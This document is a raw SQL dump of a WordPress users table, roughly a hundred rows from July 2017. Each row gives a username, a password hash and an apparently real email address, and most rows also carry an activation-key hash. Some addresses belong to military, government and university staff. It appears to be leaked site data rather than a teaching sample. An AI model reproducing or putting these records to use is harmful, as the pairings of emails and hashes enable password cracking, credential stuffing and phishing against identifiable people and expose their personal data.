INSERT INTO `wp_users` VALUES (1748, 'pscarter1962', '$P$BZLvWcWIMtFEjNpf2ih.78snt/Ors7.', 'pscarter1962', 'pscarter@yahoo.com', '', '2017-07-17 18:16:10', '1500315375:$P$B/Rko7q8aeGD8DvofQgOLpQ.PDUFgd0', 0, 'pscarter1962'); 
INSERT INTO `wp_users` VALUES (1749, 'egrinina1967', '$P$BTJz00dclvnn4HND6lz8TgNgtPA1jj/', 'egrinina1967', 'egrinina@gmail.com', '', '2017-07-17 20:16:35', '1500322600:$P$BM6g/SFf/YGTgCBivX7AXACbVi3stk0', 0, 'egrinina1967'); 
INSERT INTO `wp_users` VALUES (1750, 'chrisdupell1963', '$P$BkDPMmuLdvMEBa.oPmW3H5DsdBptPw.', 'chrisdupell1963', 'chrisdupell@hotmail.com', '', '2017-07-17 20:35:58', '1500323763:$P$BVIT4jmOGYAFGHWECvTzj7bTiEEWqM.', 0, 'chrisdupell1963'); 
INSERT INTO `wp_users` VALUES (1751, 'jtemplin', '$P$B94yyhr2ThB5YOc1MnJvqEmD/tzD4T0', 'jtemplin', 'jtemplin@ptitechnologies.com', '', '2017-07-17 20:43:23', '', 0, 'jtemplin'); 
INSERT INTO `wp_users` VALUES (1752, 'medhavijogi1965', '$P$BH4HhAGVXocl/nAu/XBTuqXuvD1doe1', 'medhavijogi1965', 'medhavijogi@gmail.com', '', '2017-07-17 21:46:32', '1500327997:$P$BgnpBS4Mgzxbqp/r0/pB2f3DbD.NR11', 0, 'medhavijogi1965'); 
INSERT INTO `wp_users` VALUES (1753, 'cubanstallion24691960', '$P$BvsnA/E8mXV2u3f4tJgwbv3ykj/LzR.', 'cubanstallion24691960', 'cubanstallion2469@yahoo.com', '', '2017-07-17 23:32:43', '1500334368:$P$BgAUAk1aLEztyfJIdKHkVPYE.jv1OL0', 0, 'cubanstallion24691960'); 
INSERT INTO `wp_users` VALUES (1754, 'purchasing6', '$P$Biv981OVgzVz52Pz658eiqlVnyuPmx.', 'purchasing6', 'purchasing@technandt.com', '', '2017-07-17 23:51:52', '', 0, 'purchasing6'); 
INSERT INTO `wp_users` VALUES (1755, 'bubbyandjuno1965', '$P$BwnkO6PLzx2B18MLVso2tZbJ3kVq3L/', 'bubbyandjuno1965', 'bubbyandjuno@yahoo.com', '', '2017-07-18 00:23:49', '1500337435:$P$BPTFii2qFGKwwyjKxBCHcG2N4k.XwO0', 0, 'bubbyandjuno1965'); 
INSERT INTO `wp_users` VALUES (1756, 'laurenschultz21970', '$P$BQe/LpKSNZWJsL02NmeYpHXZZOK/3W.', 'laurenschultz21970', 'laurenschultz2@yahoo.com', '', '2017-07-18 00:50:36', '1500339041:$P$BXjlUxm8a0yCwiZjbH9JX8ypXlVTis.', 0, 'laurenschultz21970'); 
INSERT INTO `wp_users` VALUES (1757, 'tescape071952', '$P$BWD0gAzyqHEx1BBSiqnlG9pIsUdu/T0', 'tescape071952', 'tescape07@yahoo.com', '', '2017-07-18 01:00:49', '1500339654:$P$BvwVhHZDeMx0gg1LN7cF4IxJv/V3hF0', 0, 'tescape071952'); 
INSERT INTO `wp_users` VALUES (1758, 'ronsde1996', '$P$Bxhsd5LBmSQxD4eWG8/3QJk6EOszkH/', 'ronsde1996', 'ronsde@yahoo.com', '', '2017-07-18 02:34:01', '1500345245:$P$BnxNqRlGc6EbCJHog7SyX7BbE9p3Bh.', 0, 'ronsde1996'); 
INSERT INTO `wp_users` VALUES (1759, 'vardjian1980', '$P$Bd.PGmsP5CaHNHqVRTxgk8yR2e98zl0', 'vardjian1980', 'vardjian@ptd.net', '', '2017-07-18 03:32:08', '1500348731:$P$B2EVZQ.2OtwPI7PqIMbdmWkXxywM5o/', 0, 'vardjian1980'); 
INSERT INTO `wp_users` VALUES (1760, 'robcoles31966', '$P$BviugQiJw8YtNbBFyQf7.wkzjndery1', 'robcoles31966', 'robcoles3@gmail.com', '', '2017-07-18 06:20:12', '1500358818:$P$BxwolkQJQfiEe2Yz4wZ2qm1KEK9W1f1', 0, 'robcoles31966'); 
INSERT INTO `wp_users` VALUES (1761, 'leijie12211969', '$P$BpaHDT1EC1NEinLv.sZWLAYQOT88Mp1', 'leijie12211969', 'leijie1221@gmail.com', '', '2017-07-18 06:44:11', '1500360257:$P$BWy/0sTXfLUoZgGycT/yJD7OA/Bmu20', 0, 'leijie12211969'); 
INSERT INTO `wp_users` VALUES (1762, 'robertcwilliams2000', '$P$BID7o3HLopNDfFdkszvTyzAdiAxDrx0', 'robertcwilliams2000', 'robertcwilliams@hotmail.com', '', '2017-07-18 07:14:01', '1500362046:$P$BAztfAhVRy4QWDptxwgimjCvSqAhFJ1', 0, 'robertcwilliams2000'); 
INSERT INTO `wp_users` VALUES (1763, 'agybear242000', '$P$BdF1Bka/7c363Tmv00rS.iKQz6tEP81', 'agybear242000', 'agybear24@yahoo.com', '', '2017-07-18 08:45:24', '1500367529:$P$BjYPVPYKzHPe3MAzc/d4lVIc5lxuph1', 0, 'agybear242000'); 
INSERT INTO `wp_users` VALUES (1764, 'RPAINTER', '$P$BNO0G4tsdZxIPC2p8PceaqTwTUVGrp0', 'rpainter', 'RPAINTER@IBTINC.COM', '', '2017-07-18 12:37:00', '', 0, 'RPAINTER'); 
INSERT INTO `wp_users` VALUES (1765, 'leestabert1985', '$P$Btv5Q4d.r0TxeE196AGoEVrEhM8rLO/', 'leestabert1985', 'leestabert@gmail.com', '', '2017-07-18 12:48:31', '1500382117:$P$BnBYxdldB1LAhqPC.GLYEhaNBibU5N.', 0, 'leestabert1985'); 
INSERT INTO `wp_users` VALUES (1766, 'john.cabrera', '$P$BvH/PhIKEwtTffq9kMj.5WF9CmhwRl.', 'john-cabrera', 'john.cabrera@ibsco.com', '', '2017-07-18 13:21:19', '', 0, 'john.cabrera'); 
INSERT INTO `wp_users` VALUES (1767, 'dan_steen1950', '$P$BkMh/7VJ0wIJFCyVvceoh0PWzldsKw.', 'dan_steen1950', 'dan_steen@hotmail.co.uk', '', '2017-07-18 13:46:40', '1500385604:$P$BkqoOIzrM52UKxvC7Kwk.EN/rCNKax/', 0, 'dan_steen1950'); 
INSERT INTO `wp_users` VALUES (1768, 'jus4pla1954', '$P$BnkMuXRtNnzNp/s8wwdkkLnePFCMtu0', 'jus4pla1954', 'jus4pla@gmail.com', '', '2017-07-18 13:51:52', '1500385918:$P$BePfPf/8UgOSQVAlKlMhWTjGcfFZD4/', 0, 'jus4pla1954'); 
INSERT INTO `wp_users` VALUES (1769, 'ana.montez', '$P$BFCefNc9txCqrTT3/cmr5zMwEd6jmC/', 'ana-montez', 'ana.montez@ogma.pt', '', '2017-07-18 14:08:47', '', 0, 'ana.montez'); 
INSERT INTO `wp_users` VALUES (1770, 'pixie_shadow2004', '$P$BqUlUaka.3dc2J5nhAucdHvL6zTa6o1', 'pixie_shadow2004', 'pixie_shadow@hotmail.com', '', '2017-07-18 15:15:05', '1500390910:$P$Br7oDWGI3qo3oHf9pj8ZS1OMPP/bBX1', 0, 'pixie_shadow2004'); 
INSERT INTO `wp_users` VALUES (1771, 'byron.crutcher', '$P$B5l7fJgaNJI7ZtX8MUyt22m3wDwA/p/', 'byron-crutcher', 'byron.crutcher@yahoo.com', '', '2017-07-18 15:45:12', '', 0, 'byron.crutcher'); 
INSERT INTO `wp_users` VALUES (1772, 'sdssupport2', '$P$BGYpWqgRqP4S7x8G.GQNlW20R1rdvt0', 'sdssupport2', 'sdssupport2@actio.net', '', '2017-07-18 15:47:14', '', 0, 'sdssupport2'); 
INSERT INTO `wp_users` VALUES (1773, 'amdunphy1951', '$P$BljJCcMTGef4fWVt7S3KFIbD6Yf9ER1', 'amdunphy1951', 'amdunphy@identimetrics.net', '', '2017-07-18 15:49:43', '1500392986:$P$BnAOgAQmBw/bQ9hybC8pNlZonpM1e00', 0, 'amdunphy1951'); 
INSERT INTO `wp_users` VALUES (1774, 'chris.weishaar', '$P$BJcjMP4KaTkif.H/jxbYvrP8kHusnv/', 'chris-weishaar', 'chris.weishaar@navy.mil', '', '2017-07-18 16:46:04', '', 0, 'chris.weishaar'); 
INSERT INTO `wp_users` VALUES (1775, 'hicks', '$P$BkZ8yCimKz8LdUUpwERj.Sinoni.x61', 'hicks', 'hicks@fnal.gov', '', '2017-07-18 17:25:25', '', 0, 'hicks'); 
INSERT INTO `wp_users` VALUES (1776, 'jsmith1999', '$P$BfWhbQkQenwC16ImCk/5HpOMNCDWNM1', 'jsmith1999', 'jsmith@clubfitness.us', '', '2017-07-18 18:06:08', '1500401178:$P$BQ9dx0DL5ecXxVp1zzpE8E2aI0Yjjr.', 0, 'jsmith1999'); 
INSERT INTO `wp_users` VALUES (1777, 'kmordica1989', '$P$BtxdYJW0Z4kZ3Dw0MshKmSk/rhtOb70', 'kmordica1989', 'kmordica@hotmail.com', '', '2017-07-18 19:42:48', '1500406972:$P$BXiRgBWu33u/xEGYKeYgSyfD93CdJD1', 0, 'kmordica1989'); 
INSERT INTO `wp_users` VALUES (1778, 'michael.reed.32', '$P$BGPgAH26g39BE2SC.7EHJWs8EhlFWm/', 'michael-reed-32', 'michael.reed.32@us.af.mil', '', '2017-07-18 21:19:12', '', 0, 'michael.reed.32'); 
INSERT INTO `wp_users` VALUES (1779, 'merrellhora1978', '$P$BtdmoYYkjgVNbkG0SifZJVZqhfuSGk0', 'merrellhora1978', 'merrellhora@gmail.com', '', '2017-07-18 21:53:28', '1500414814:$P$BaxwDX1PquWsFN12UTr8j9qnS8khyZ1', 0, 'merrellhora1978'); 
INSERT INTO `wp_users` VALUES (1780, 'margaretblankenbaker1998', '$P$B9SzmDZYKT5lVvtyFOoNYxxa/6sYbr0', 'margaretblankenbaker1998', 'margaretblankenbaker@hotmail.com', '', '2017-07-18 22:36:51', '1500417416:$P$BUOpb9A5gpC6aC9Ex1whNuBh5UkjKa.', 0, 'margaretblankenbaker1998'); 
INSERT INTO `wp_users` VALUES (1781, 'marco7297292007', '$P$BI9FlwxyWScDaY9J1qnX5koRK2TcUs0', 'marco7297292007', 'marco729729@yahoo.com', '', '2017-07-18 22:52:34', '1500418357:$P$BnCp69mwRtLePy.lbLN8Zgn2bLDD1E/', 0, 'marco7297292007'); 
INSERT INTO `wp_users` VALUES (1782, 'ronvance11996', '$P$Ba/PRk8hcNDEeGlwRogilkueNSzacM0', 'ronvance11996', 'ronvance1@hotmail.com', '', '2017-07-19 00:24:22', '1500423873:$P$BunIocJLqUiDiUuByZoPOlxsmEpyEt1', 0, 'ronvance11996'); 
INSERT INTO `wp_users` VALUES (1783, 'douellette8202008', '$P$BcfnnpRD66AYZlfrQDhIC3TR7rRpYe.', 'douellette8202008', 'douellette820@aol.com', '', '2017-07-19 00:24:59', '1500423906:$P$B1c31PUkytNlDdARAavlf2JUhIr7Da1', 0, 'douellette8202008'); 
INSERT INTO `wp_users` VALUES (1784, 'joshuapdudley1969', '$P$Bl5A8pcsVp/HdOUhq8Nq7u1.C3KacH1', 'joshuapdudley1969', 'joshuapdudley@yahoo.com', '', '2017-07-19 00:57:35', '1500425860:$P$BBL3mOs04xRoX0TaByVOuDXctxm23t1', 0, 'joshuapdudley1969'); 
INSERT INTO `wp_users` VALUES (1785, 'bill.mcgarry1972', '$P$BVlpUHykJzBh4tP4GUmIp4/oq6BFfa1', 'bill-mcgarry1972', 'bill.mcgarry@comcast.net', '', '2017-07-19 01:25:02', '1500427506:$P$BVX1z8/TONfWjwz8qK.7TQDtyBSNJ4/', 0, 'bill.mcgarry1972'); 
INSERT INTO `wp_users` VALUES (1786, 'solbakkenk1969', '$P$BIrNuSk2VQ7WfptWhAvrot.MQyMBCi.', 'solbakkenk1969', 'solbakkenk@live.com', '', '2017-07-19 01:39:21', '1500428369:$P$BdZaktL.jx8YHrreDDsz4B.fKfDMmH/', 0, 'solbakkenk1969'); 
INSERT INTO `wp_users` VALUES (1787, 'jhonatanb_8', '$P$BSnwsc8uPX3b26jBQqofzqG9DRKriv/', 'jhonatanb_8', 'jhonatanb_8@hotmail.com', '', '2017-07-19 03:22:06', '', 0, 'jhonatanb_8'); 
INSERT INTO `wp_users` VALUES (1788, 'sugaal.daher1975', '$P$BGwWgZXp33B6ocwo.RZi5bncPKsr6c/', 'sugaal-daher1975', 'sugaal.daher@gmail.com', '', '2017-07-19 08:53:18', '1500454404:$P$BQurK71oWJYf6KIVvugCW0VUL7EYs20', 0, 'sugaal.daher1975'); 
INSERT INTO `wp_users` VALUES (1789, 'patrick.hottenrott2006', '$P$BO18X92zGHB65pnZiBSyeqLrJpgYJx.', 'patrick-hottenrott2006', 'patrick.hottenrott@gmx.de', '', '2017-07-19 09:11:58', '1500455525:$P$B6mRgPQ5QPFed2xUSbPoz59Jh0jh1Z0', 0, 'patrick.hottenrott2006'); 
INSERT INTO `wp_users` VALUES (1790, 'faltynkova.alena', '$P$B9vLXVFrDHd3fZrkhAowqH4RNEYZ5r0', 'faltynkova-alena', 'faltynkova.alena@csatechnics.com', '', '2017-07-19 10:24:31', '', 0, 'faltynkova.alena'); 
INSERT INTO `wp_users` VALUES (1791, 'Joyce.Chindove', '$P$Bn5sqgz9eLx2NBi5g9sDmE/4z1iYoD.', 'joyce-chindove', 'Joyce.Chindove@haasgroupintl.com', '', '2017-07-19 11:06:45', '', 0, 'Joyce.Chindove'); 
INSERT INTO `wp_users` VALUES (1792, 'vmassa2142000', '$P$B7SyVXVseqAiImOZHFho1sFcMRC2HL0', 'vmassa2142000', 'vmassa214@outlook.com', '', '2017-07-19 11:35:37', '1500464142:$P$B5yTCGb80aIEgFsqgVqGlPe3ne75bG0', 0, 'vmassa2142000'); 
INSERT INTO `wp_users` VALUES (1793, 'barbara.wilson.5', '$P$BHHBrPX.wLqIOtgU3h.dUesF9n0rfz1', 'barbara-wilson-5', 'barbara.wilson.5@us.af.mil', '', '2017-07-19 11:42:33', '', 0, 'barbara.wilson.5'); 
INSERT INTO `wp_users` VALUES (1794, 'pier70partners1955', '$P$BOYNnBtrcAMz4.jfPo2IYw.09Sx.zz.', 'pier70partners1955', 'pier70partners@gmail.com', '', '2017-07-19 11:53:02', '1500465187:$P$BLAc8/ipMMHTRU.f9SDs8HWxIAUh5g.', 0, 'pier70partners1955'); 
INSERT INTO `wp_users` VALUES (1795, 'julia', '$P$BfonUBGQwqiCx5XQN2GS0YuIRQTWLE.', 'julia', 'julia@garelectroforming.com', '', '2017-07-19 11:56:12', '', 0, 'julia'); 
INSERT INTO `wp_users` VALUES (1796, 'katielass1980', '$P$B72raEEELR/vw.Umn/9yQ1q8KsgbSX1', 'katielass1980', 'katielass@gmail.com', '', '2017-07-19 12:49:15', '1500468559:$P$BgggrFN8cK8n3SBcgn1gT1XHXl9Ble.', 0, 'katielass1980'); 
INSERT INTO `wp_users` VALUES (1797, 'bosamonte21980', '$P$B6f7PHGmhHlh9hb197yM9Gr/g1ijU4.', 'bosamonte21980', 'bosamonte2@aol.com', '', '2017-07-19 12:59:05', '1500469150:$P$BOSXZDCBnaA4LE14sBawAqMupIuMYI.', 0, 'bosamonte21980'); 
INSERT INTO `wp_users` VALUES (1798, 'neil.c.bird1965', '$P$BRM5xtF3zQ54wKazHlitTjhlQw2vkf0', 'neil-c-bird1965', 'neil.c.bird@hotmail.co.uk', '', '2017-07-19 13:46:54', '1500472019:$P$BUCDiZucQDfF4N4pwNd0gPHl5dEaTO0', 0, 'neil.c.bird1965'); 
INSERT INTO `wp_users` VALUES (1799, 'dgreise1', '$P$Bs3ZAWJDGuQ7m4aYCUxF2YjGQDoBys1', 'dgreise1', 'dgreise1@yahoo.com', '', '2017-07-19 14:17:37', '', 0, 'dgreise1'); 
INSERT INTO `wp_users` VALUES (1800, 'michelle.keenan', '$P$B.Gltpe5OgOQ/WyvEx//L9uiwwHKq3.', 'michelle-keenan', 'michelle.keenan@kaman.com', '', '2017-07-19 14:19:08', '', 0, 'michelle.keenan'); 
INSERT INTO `wp_users` VALUES (1801, 'chancellesuits1980', '$P$BYGY6s83kecIJp6x/1f4g35NV8OEIT/', 'chancellesuits1980', 'chancellesuits@aol.com', '', '2017-07-19 14:24:06', '1500474252:$P$BSrk6w7zPO37LGRKdf0vjtO5OvAmqG/', 0, 'chancellesuits1980'); 
INSERT INTO `wp_users` VALUES (1802, 'scottscrsupply1973', '$P$BnxUX3VB.Vb6ux2a9kaqEmASMS5f5S/', 'scottscrsupply1973', 'scottscrsupply@hotmail.com', '', '2017-07-19 15:31:01', '1500478266:$P$B/YZiPGoTDwiFGm3S5YuDMCCNHR6vn0', 0, 'scottscrsupply1973'); 
INSERT INTO `wp_users` VALUES (1803, 'penno781983', '$P$BkWrly1Gw/z8WSap9s9uMOKspLsYaA/', 'penno781983', 'penno78@yahoo.de', '', '2017-07-19 15:42:37', '1500478962:$P$BaAoEF28x6GNE7xKFuDPSHgmODidF30', 0, 'penno781983'); 
INSERT INTO `wp_users` VALUES (1804, 'jebandsabrina1983', '$P$BVRfDDYzvTyb9DD.DCHJaql21BleSD0', 'jebandsabrina1983', 'jebandsabrina@hotmail.com', '', '2017-07-19 17:27:03', '1500485229:$P$BsF3ZyBTPF3KONFQs/YMQktnMyI5m31', 0, 'jebandsabrina1983'); 
INSERT INTO `wp_users` VALUES (1805, 'waltertiffany1973', '$P$BGhUgSZYrDJwbFGpPSukAfjeVq8Sj5.', 'waltertiffany1973', 'waltertiffany@icloud.com', '', '2017-07-19 18:08:33', '1500487719:$P$BJw4KaGuzAqSpkeiKZ3DBhd.pwyzrJ1', 0, 'waltertiffany1973'); 
INSERT INTO `wp_users` VALUES (1806, 'rosewood_acres1954', '$P$BJp4bMGS5Z6tsrCQD2ip2QJvkoDMhe.', 'rosewood_acres1954', 'rosewood_acres@yahoo.com', '', '2017-07-19 18:20:16', '1500488419:$P$BSDbFwvrCTDEjU0kKCV48.BCw.G6Bh0', 0, 'rosewood_acres1954'); 
INSERT INTO `wp_users` VALUES (1807, 'andrew.jaye1953', '$P$BsyOMYk742o3StHJKuKY1mEvCMtdPi.', 'andrew-jaye1953', 'andrew.jaye@gmail.com', '', '2017-07-19 18:45:20', '1500489925:$P$BQaFCFu/Tf3WqcW1hHJFsRg8G1AxN21', 0, 'andrew.jaye1953'); 
INSERT INTO `wp_users` VALUES (1808, 'mindovermtr2007', '$P$B4EtUq3JiK3YEp3sMYiS4uUI3rEy7B.', 'mindovermtr2007', 'mindovermtr@gmail.com', '', '2017-07-19 20:49:02', '1500497347:$P$BcIGdDC3bqsrJnd4jLZ03SHzI34os70', 0, 'mindovermtr2007'); 
INSERT INTO `wp_users` VALUES (1809, 'jasonparsons6662006', '$P$BXyVWeC7C03OqfvyECwaGmOyUKg.Xx1', 'jasonparsons6662006', 'jasonparsons666@hotmail.com', '', '2017-07-19 22:08:12', '1500502097:$P$BMNYpWscfMwdWZeUCJn.5HZr4Fedeo.', 0, 'jasonparsons6662006'); 
INSERT INTO `wp_users` VALUES (1810, 'marcusferran1970', '$P$BP4Jgnb4r74Tzma7V4fHgOJGqgRyzc/', 'marcusferran1970', 'marcusferran@yahoo.com', '', '2017-07-19 22:16:53', '1500502618:$P$B0wDzggMpnX5mHuD33VLJwMxfE82h/0', 0, 'marcusferran1970'); 
INSERT INTO `wp_users` VALUES (1811, 'cav1knight1950', '$P$BhFlYC4hk1XtvZQO4rc1Z/q4Gb/ZuL/', 'cav1knight1950', 'cav1knight@aol.com', '', '2017-07-19 22:30:41', '1500503447:$P$BMQYBMN5MS11PEETxkh.IhDiCun0kH/', 0, 'cav1knight1950'); 
INSERT INTO `wp_users` VALUES (1812, 'damionmadison0031961', '$P$BHG8lU0lS6udBuDncmmVQuHexZUFBm/', 'damionmadison0031961', 'damionmadison003@gmail.com', '', '2017-07-19 22:55:42', '1500504947:$P$BM4.hnw8MaxHp9WA4Kxp0dZ19oIsIS1', 0, 'damionmadison0031961'); 
INSERT INTO `wp_users` VALUES (1813, 'jyelton1958', '$P$B8Zc1O3MNV3K.kbh4fSdm4xzJrrdQ31', 'jyelton1958', 'jyelton@bellsouth.net', '', '2017-07-19 22:57:08', '1500505033:$P$BHHmEusslTKSoWZJOQhCIJxCDxhqLC1', 0, 'jyelton1958'); 
INSERT INTO `wp_users` VALUES (1814, 'simplot71973', '$P$BmwAmiY1.GfukMLHmYtMB8vO/GKom0/', 'simplot71973', 'simplot7@hotmail.com', '', '2017-07-19 23:07:44', '1500505670:$P$BF9cCqg4US7NyAM/hY2OJA5l3DgIaN0', 0, 'simplot71973'); 
INSERT INTO `wp_users` VALUES (1815, 'andrea.stahl2007', '$P$BtG0WkTlGJwUkFoigLPvLeenQz2m2T/', 'andrea-stahl2007', 'andrea.stahl@aol.com', '', '2017-07-19 23:41:51', '1500507714:$P$BcmIluuQ7j/PABnW7WQUGoRQ4V7v.s0', 0, 'andrea.stahl2007'); 
INSERT INTO `wp_users` VALUES (1816, 'marlakradcliffe1959', '$P$BM2wfDVN7pv.NN3EVRNKXQnKksuAJw.', 'marlakradcliffe1959', 'marlakradcliffe@yahoo.com', '', '2017-07-20 00:43:30', '1500511413:$P$BhV4YCmw6G.fCY1h/uus017t1/NpUk/', 0, 'marlakradcliffe1959'); 
INSERT INTO `wp_users` VALUES (1817, 'mattsmom901999', '$P$BzPVePnW1NbPVXz/QKF2xFzqznfSHK1', 'mattsmom901999', 'mattsmom90@hotmail.com', '', '2017-07-20 01:53:07', '1500515591:$P$BM7gC84Xd.2IVdJmQ6b.4qMVbJVbEX1', 0, 'mattsmom901999'); 
INSERT INTO `wp_users` VALUES (1818, 'jltteague1999', '$P$Bc/bpTtUDQe9tr1TSuLWly9dbj6YOc.', 'jltteague1999', 'jltteague@msn.com', '', '2017-07-20 02:03:39', '1500516223:$P$B7zzQDlox9eRLdFX8sWYlHzUp7IMp8.', 0, 'jltteague1999'); 
INSERT INTO `wp_users` VALUES (1819, 'ken.prideaux', '$P$BjnMVJYDFhVukht.kIrW.1iyE9tBkK1', 'ken-prideaux', 'ken.prideaux@yahoo.com', '', '2017-07-20 06:01:05', '', 0, 'ken.prideaux'); 
INSERT INTO `wp_users` VALUES (1820, 'nasheenfire1985', '$P$BWzCx1/mOmlfCftFFQpZtPA/tXTTqF.', 'nasheenfire1985', 'nasheenfire@gmail.com', '', '2017-07-20 07:15:45', '1500534951:$P$B/SoH6hfxLykIzlg.OxE4GmBdblofo.', 0, 'nasheenfire1985'); 
INSERT INTO `wp_users` VALUES (1821, 'asgueguen1986', '$P$B0eDSuODAustjPAlCBYpOqVV780hzd1', 'asgueguen1986', 'asgueguen@aol.com', '', '2017-07-20 11:37:45', '1500550674:$P$BQiOEccgbqBWZx6JVONMqtYf1N49qL.', 0, 'asgueguen1986'); 
INSERT INTO `wp_users` VALUES (1822, 'jamjlc171984', '$P$BYUsmwhyClMJ3E9APnu91dWO2Gjfen/', 'jamjlc171984', 'jamjlc17@gmail.com', '', '2017-07-20 12:37:33', '1500554257:$P$BHyS.rjvzqtkY71jz94DFfbdffaSvz/', 0, 'jamjlc171984'); 
INSERT INTO `wp_users` VALUES (1823, 'skrave', '$P$BaSLqxb4S4HLyUPC/P5MMajDUOZLIU1', 'skrave', 'skrave@fnal.gov', '', '2017-07-20 14:21:59', '', 0, 'skrave'); 
INSERT INTO `wp_users` VALUES (1824, 'kduane1681953', '$P$B0hcjvbju9T1Jap4kkIGD1QibZQn1X.', 'kduane1681953', 'kduane168@yahoo.com', '', '2017-07-20 15:10:25', '1500563431:$P$B5AdhvbYIllW2Xs5MXDBGwjWarbyfH.', 0, 'kduane1681953'); 
INSERT INTO `wp_users` VALUES (1825, 'cklynch', '$P$BTtuANftcP3cBtoIWA8jnCCnFtpoed.', 'cklynch', 'cklynch@illinois.edu', '', '2017-07-20 15:38:08', '', 0, 'cklynch'); 
INSERT INTO `wp_users` VALUES (1826, 'bruce.winter', '$P$B6gDxItmykCJCGHAlPsG5bziWi9ecp/', 'bruce-winter', 'bruce.winter@navy.mil', '', '2017-07-20 16:06:02', '', 0, 'bruce.winter'); 
INSERT INTO `wp_users` VALUES (1827, 'michelle.montoya', '$P$BhiSt.TbplHG6iHkcuVqomLrtFvXef0', 'michelle-montoya', 'michelle.montoya@uc.edu', '', '2017-07-20 17:51:03', '1500573098:$P$Betr0oW7u4Ovku5TF3QBt5xMCVWryU0', 0, 'michelle.montoya'); 
INSERT INTO `wp_users` VALUES (1828, 'wsdmilner1997', '$P$BtiL7VXSWbmy2iSQp/Fal2dlz//eiW1', 'wsdmilner1997', 'wsdmilner@yahoo.com', '', '2017-07-20 18:42:24', '1500576148:$P$BrYa9p.PDnCVExuG2RyGkRsyF3ofGb/', 0, 'wsdmilner1997'); 
INSERT INTO `wp_users` VALUES (1829, 'jianbai_wang1952', '$P$BZlXRmfaOa6pBBj3XRPBPaGOIqnhaU.', 'jianbai_wang1952', 'jianbai_wang@hotmail.com', '', '2017-07-20 19:10:05', '1500577812:$P$BlNmbaJuRf.vZWONAqPr0f1M1BhS890', 0, 'jianbai_wang1952'); 
INSERT INTO `wp_users` VALUES (1830, 'paizlaura1964', '$P$BvQvLSWcLz5ratKZwbW6heyUjeIRgQ.', 'paizlaura1964', 'paizlaura@hotmail.com', '', '2017-07-20 21:44:51', '1500587095:$P$Biixv2jTGPa4pkh/PBSz..sMiX9rTJ1', 0, 'paizlaura1964'); 
INSERT INTO `wp_users` VALUES (1831, 'mizzduffin1973', '$P$B.Y0jP1ouxFGsKwxSfi4Tws7gTKkkX0', 'mizzduffin1973', 'mizzduffin@yahoo.com', '', '2017-07-20 22:00:42', '1500588047:$P$BilFK7A.nslCqRSyUTcKThcOREUH8m.', 0, 'mizzduffin1973'); 
INSERT INTO `wp_users` VALUES (1832, 'walterpsas1994', '$P$Bvhu83DRRXdmoHGtwKL3dQWe3J2s5A.', 'walterpsas1994', 'walterpsas@usa.com', '', '2017-07-20 22:39:38', '1500590390:$P$BTUTO34qmrdMbI0K49.touZjtdf1dt1', 0, 'walterpsas1994'); 
INSERT INTO `wp_users` VALUES (1833, 'leighsuga1984', '$P$BnfdbgI4nsHSgGoikuoSDszvS1JVIy1', 'leighsuga1984', 'leighsuga@hotmail.com', '', '2017-07-21 00:19:42', '1500596386:$P$B1OLfSHH71KHsdTzDfYyL5W4gXahAI0', 0, 'leighsuga1984'); 
INSERT INTO `wp_users` VALUES (1834, 'jnestroy1988', '$P$BsQpcA1nw3o9wCLmmSQE7wHVj4Ed5p/', 'jnestroy1988', 'jnestroy@hotmail.com', '', '2017-07-21 01:02:45', '1500598971:$P$BAusaRlyT7bqbHLKjNS3aA5wmI2RFr0', 0, 'jnestroy1988'); 
INSERT INTO `wp_users` VALUES (1835, 'brice.kayli2005', '$P$BfXGrZw9lI98ErsPQBpQrCuX1VDDRt/', 'brice-kayli2005', 'brice.kayli@yahoo.com', '', '2017-07-21 01:10:46', '1500599452:$P$B1F02yWrw3e92vRh.ZtlxEKXrRfysp.', 0, 'brice.kayli2005'); 
INSERT INTO `wp_users` VALUES (1836, 'ptazrn1960', '$P$BMR2OjXtd1tRI/f5JFbPFe50dgK9hD1', 'ptazrn1960', 'ptazrn@gmail.com', '', '2017-07-21 01:12:30', '1500599555:$P$BqHn6RyHhf2CRI9SE9wACxJR6ubn9b/', 0, 'ptazrn1960'); 
INSERT INTO `wp_users` VALUES (1837, 'avimscher1981', '$P$B7xz/bjNV7E3tKQr9h/UDenN4QwKd2.', 'avimscher1981', 'avimscher@gmail.com', '', '2017-07-21 02:33:07', '1500604392:$P$BJrJAnsvHvmZXixDuSHpx3QTPWnKcv.', 0, 'avimscher1981'); 
INSERT INTO `wp_users` VALUES (1838, 'isquaredz1950', '$P$B0sJNlofxW/q4fIdIDscrgGMyvdYfU.', 'isquaredz1950', 'isquaredz@live.com', '', '2017-07-21 10:11:13', '1500631878:$P$BdAwfgaayVDjmVbUVe1OUwPVYpOYFU.', 0, 'isquaredz1950'); 
INSERT INTO `wp_users` VALUES (1839, 'mgbyas1956', '$P$B2Tt.3.E.gs23iBIyfFJOhsBxQzbW0/', 'mgbyas1956', 'mgbyas@yahoo.com', '', '2017-07-21 10:14:38', '1500632082:$P$BnmiMczpb3WB4r866TpUxrxyb/udKZ0', 0, 'mgbyas1956'); 
INSERT INTO `wp_users` VALUES (1840, 'clintsparks22001', '$P$BAGw0VRL4W7qcbAKYv1EDxRRdQoW6T.', 'clintsparks22001', 'clintsparks2@gmail.com', '', '2017-07-21 12:52:06', '1500641531:$P$BZYGaMTBHsFXuiDuLYC3Dz.qDoLyXw.', 0, 'clintsparks22001'); 
INSERT INTO `wp_users` VALUES (1841, 'mcrujei1983', '$P$BLUp.8VyeSiOVtTCKgL1kiGiGYfwdg0', 'mcrujei1983', 'mcrujei@gmail.com', '', '2017-07-21 14:15:16', '1500646521:$P$BG0QPQIIeyNkczzKorcJmEPem6FrcN0', 0, 'mcrujei1983'); 
INSERT INTO `wp_users` VALUES (1842, 'randy.hollins', '$P$BHQOs9ytjbIQvk3leHofzE/XUmiOaX.', 'randy-hollins', 'randy.hollins@psiusa.com', '', '2017-07-21 14:24:33', '', 0, 'randy.hollins'); 
INSERT INTO `wp_users` VALUES (1843, 'kurtzd11987', '$P$Bp8pcDY0fjkSrCg62wMBam0XWoUWHL/', 'kurtzd11987', 'kurtzd1@verizon.net', '', '2017-07-21 14:55:26', '1500648932:$P$B.eZGb2XnF3dKOA84NTTWEW6Zn3xOR.', 0, 'kurtzd11987'); 
INSERT INTO `wp_users` VALUES (1844, 'alvin.taylor1955', '$P$B6sas3VXrN4x89vIyaOKxfj6FD7mqq1', 'alvin-taylor1955', 'alvin.taylor@gmail.com', '', '2017-07-21 16:27:38', '1500654464:$P$BkZRdLe6pyoxeXie.XcoFQcvAMXct90', 0, 'alvin.taylor1955'); 
